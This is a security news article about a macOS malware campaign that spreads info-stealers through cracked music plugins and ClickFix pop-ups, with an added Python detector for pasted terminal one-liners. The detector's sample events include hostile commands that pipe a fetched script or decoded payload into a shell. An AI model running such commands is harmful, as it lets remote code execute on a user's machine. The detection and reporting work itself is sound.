ClickFix browser-populated pop-up
For many digital creators and music producers, the allure of high-end audio plugins can often lead to a search for “cracked” versions to save costs. However, a new investigation by security researchers at Iru reveals that this pursuit of free software is currently being weaponized in a massive, multi-stage malware campaign targeting macOS users.
The campaign, discovered on February 4, 2026, uses a sophisticated delivery pipeline to distribute a variety of info-stealers and backdoors, including the notorious Odyssey and MacSyncStealer malware.
The attack begins with social engineering, as threat actors distribute malicious Disk Image (DMG) files disguised as legitimate, professional music software.
“Threat actors utilize social engineering to deceive users into installing malicious DMG files disguised as cracked music plugins,” the Iru report explains. Even though these DMG files are unsigned—a major red flag for macOS security—the report notes that “the social engineering lure successfully convinces users to attempt to execute files manually”.
Once the user mounts the DMG and attempts the installation, a series of malicious artifacts are triggered, including a binary loader and a secondary bash script.
What makes this campaign particularly resilient is the use of a “ClickFix” style attack. “The malware attempts to run harmful scripts immediately when executed,” Iru researchers observed. Furthermore, it employs “a ‘ClickFix’ style attack via browser pop-up to trick users into manually copying and pasting malicious code, potentially re-infecting the system even after an initial compromise”.
By utilizing the victim’s own actions to paste code into a terminal or run dialog, the attackers effectively bypass modern browser download protections and Gatekeeper warnings.
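The pasted-into-terminal behaviour described above is detectable on the endpoint. The following is an added example (not code from the Iru report) that scans constructed process-execution events, in the shape an EDR or unified-log parser might emit, for the signature a ClickFix payload leaves: a fetch or decode stage piped straight into a shell interpreter from an interactive terminal. The event format, field names and sample commands are assumptions for illustration.

```python
import json
import re

# Constructed sample telemetry (made-up events, not from the report): one JSON
# process-execution record per line, with the parent application name included.
SAMPLE_EVENTS = """
{"pid": 501, "ppid": 400, "parent": "Terminal", "proc": "zsh", "cmd": "ls -la ~/Music/Plugins"}
{"pid": 502, "ppid": 400, "parent": "Terminal", "proc": "zsh", "cmd": "echo 'cGxhY2Vob2xkZXI=' | base64 -d | bash"}
{"pid": 503, "ppid": 400, "parent": "Terminal", "proc": "zsh", "cmd": "curl -fsSL http://example.invalid/installer.sh | sh"}
{"pid": 504, "ppid": 410, "parent": "Finder", "proc": "hdiutil", "cmd": "hdiutil attach ~/Downloads/Plugin.dmg"}
{"pid": 505, "ppid": 400, "parent": "Terminal", "proc": "zsh", "cmd": "git pull origin main"}
"""

# Stage that produces attacker-supplied bytes: a network fetch or an inline decode.
SOURCE_STAGE = re.compile(r"\b(curl|wget|base64\s+(-d|--decode)|openssl\s+enc\s+-d|xxd\s+-r)\b")
# Stage that executes those bytes: the output piped into an interpreter.
SINK_STAGE = re.compile(r"\|\s*(sudo\s+)?(bash|sh|zsh|osascript|python3?)\b")
# ClickFix lures tell the user to paste into a desktop terminal, so the shell's
# parent is an interactive terminal app rather than an installer or daemon.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}


def is_clickfix_like(event: dict) -> bool:
    """True when a command run from an interactive terminal pipes fetched or
    decoded content into an interpreter, the pattern a pasted lure produces."""
    cmd = event.get("cmd", "")
    return (event.get("parent") in INTERACTIVE_PARENTS
            and SOURCE_STAGE.search(cmd) is not None
            and SINK_STAGE.search(cmd) is not None)


def scan_events(raw: str) -> list[int]:
    """Return the pids of all events matching the ClickFix-like pattern."""
    hits = []
    for line in raw.strip().splitlines():
        event = json.loads(line)
        if is_clickfix_like(event):
            hits.append(event["pid"])
    return hits


if __name__ == "__main__":
    print(scan_events(SAMPLE_EVENTS))  # [502, 503]
```

A plain `curl -O` download without a pipe into a shell is deliberately not flagged, so the rule stays quiet on ordinary developer activity while catching the one-liner shape the lure relies on.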
The technical sophistication of the delivery chain suggests this is not a one-off operation by a single hacker. Instead, researchers believe this is a professionalized “Loader as a Service”—a malware distribution platform sold to other cybercriminals.
The operation is deeply embedded in the “Pay-Per-Install” (PPI) ecosystem, where attackers earn a bounty for every device they successfully infect. By targeting the creative community with music plugins, the actors ensure a steady stream of high-value targets, often using machines with significant processing power and sensitive intellectual property.
Analysis of the secondary distributor scripts revealed a highly organized infrastructure. Deobfuscated code snippets showed the malware calling back to a command-and-control (C2) domain at kuturu.com using unique API keys and tokens to track the status of the infection.
“Within the DMG’s Installer directory, researchers identified two critical artifacts: a malicious mach-O binary and a bash script,” the report details, identifying them as the primary drivers for the ClickFix lures and the subsequent info-stealer payloads.
To protect your digital studio and personal data, security experts recommend:
- Avoid “Cracked” Software: Only download plugins and software from official developer websites or authorized retailers.
- Respect macOS Warnings: If your system warns that an application is unsigned or from an unidentified developer, do not manually override the security block.
- Beware of Unusual Prompts: Never copy and paste code from a website into your terminal or a Run dialog, regardless of how “official” the verification prompt appears.